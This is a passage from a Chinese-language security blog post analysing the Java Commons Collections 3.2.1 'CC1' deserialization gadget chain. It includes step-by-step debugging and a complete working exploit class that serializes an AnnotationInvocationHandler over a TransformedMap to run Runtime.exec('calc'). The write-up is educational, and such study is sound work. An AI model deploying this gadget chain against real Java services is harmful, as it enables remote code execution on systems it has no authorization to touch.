class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line">chainedTransformer.transform(cs);</span><br></pre></td></tr></table></figure>

<p>成功解决问题一</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003211031373.png"></p>
<p>我们修改一下之前骨架的内容</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将上面的代码修改成下面的代码</span></span><br><span class="line"></span><br><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br></pre></td></tr></table></figure>

<p><strong>问题二：</strong></p>
<p>首先在<code>AnnotationInvocationHandler</code>类的<code>readObject</code>方法的第一个if判断语句处打断点，调试后可以看到<code>memberType</code>值为null，无法进入if语句</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003214953003.png"></p>
<p>分析代码，可知<code>memberTypes</code>是表示注解类型里所有成员及其对应的数据类型的映射关系，然后<code>memberType</code>获取注解中成员变量的名称</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003220854217.png"></p>
<p>一开始我们用的是注解<code>Override</code>，这里面没有成员变量</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003221201954.png"></p>
<p>那就不用这个，继续寻找发现注解<code>Target</code>里有成员变量<code>value</code>，可以用这个</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003221321592.png"></p>
<p>回到之前的exp骨架那里，修改两处地方</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003221813065.png"></p>
<p>重新调试一遍，这次没有问题了，成功进入第一个if语句</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003222558505.png"></p>
<p>接下来就是第二个if语句，只要我们传入的<code>value</code>既不是<code>memberType</code>对应类型的实例，也不是异常代理类对象<code>ExceptionProxy</code>实例，就可以进入if语句</p>
<p>因为成员<code>value</code>的声明类型是枚举数组<code>ElementType[]</code>，而传入的是字符串<code>&quot;world&quot;</code>，判断后返回false，然后经过取反后就变为true，成功进入if语句</p>
<p><strong>问题三：</strong></p>
<p>最后就是解决<code>readObject()</code>调用的<code>setValue()</code>参数不可控，继续分析代码，发现<code>ConstantTransformer</code>类刚好满足我们的要求，它重写后的<code>transform</code>可以返回我们传入的对象</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003233700161.png"></p>
<p>修改之前的代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将上面的代码修改成下面的代码，添加ConstantTransformer</span></span><br><span class="line"></span><br><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">    <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(cs),<span class="comment">// 修改这里</span></span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">	<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br></pre></td></tr></table></figure>

<h3 id="完整代码"><a href="#完整代码" class="headerlink" title="完整代码"></a>完整代码</h3><p>把之前的代码合并在一起，得到以下完整代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(cs),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line">        Map&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;world&quot;</span>);</span><br><span class="line">        Map&lt;Object, Object&gt; transformermap = TransformedMap.decorate(map,<span class="literal">null</span>,chainedTransformer);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">annotationConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        annotationConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationConstructor.newInstance(Target.class,transformermap);</span><br><span class="line">        serialize(o);</span><br><span class="line">        unserialize(<span class="string">&quot;cc1.txt&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.txt&quot;</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">unserialize</span><span class="params">(String filename)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(filename));</span><br><span class="line">        ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251003234530672.png"></p>
<p>成功弹出计算器，实现完整的漏洞链利用</p>
<p>到这里CC1的复现就结束了，确实不容易，不过收获很大，想要提升水平还是得多练代码审计，继续加油吧</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>Java反序列化 CC1链分析</p><p><a href="https://waynejoon.github.io/posts/java-cc1-gadget-chain-analysis/">https://waynejoon.github.io/posts/java-cc1-gadget-chain-analysis/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-10-04</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计, </a><a class="link-muted" rel="tag" href="/tags/CC%E9%93%BE%E5%88%86%E6%9E%90/">CC链分析 </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/2024CISCN_Sanic/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">2024CISCN Sanic复现</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/ctfshow-mid-term-assessment-2-web502-web516/"><span class="level-item">CTFSHOW 中期测评（二）web502 - web516</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">28</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">9</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#CC1链子介绍"><span class="level-left"><span class="level-item">1</span><span class="level-item">CC1链子介绍</span></span></a></li><li><a class="level is-mobile" href="#环境准备"><span class="level-left"><span class="level-item">2</span><span class="level-item">环境准备</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#下载安装-JDK-8u65"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">下载安装 JDK-8u65</span></span></a></li><li><a class="level is-mobile" href="#通过Maven下载CommonsCollections3-2-1"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">通过Maven下载CommonsCollections3.2.1</span></span></a></li><li><a class="level is-mobile" href="#配置对应源码"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">配置对应源码</span></span></a></li></ul></li><li><a class="level is-mobile" href="#CC1链分析"><span class="level-left"><span class="level-item">3</span><span class="level-item">CC1链分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#利用点"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">利用点</span></span></a></li><li><a class="level is-mobile" href="#溯源"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">溯源</span></span></a></li><li><a class="level is-mobile" href="#待解决问题"><span class="level-left"><span class="level-item">3.3</span><span class="level-item">待解决问题</span></span></a></li><li><a class="level is-mobile" href="#修补"><span class="level-left"><span class="level-item">3.4</span><span class="level-item">修补</span></span></a></li><li><a class="level is-mobile" href="#完整代码"><span class="level-left"><span class="level-item">3.5</span><span class="level-item">完整代码</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>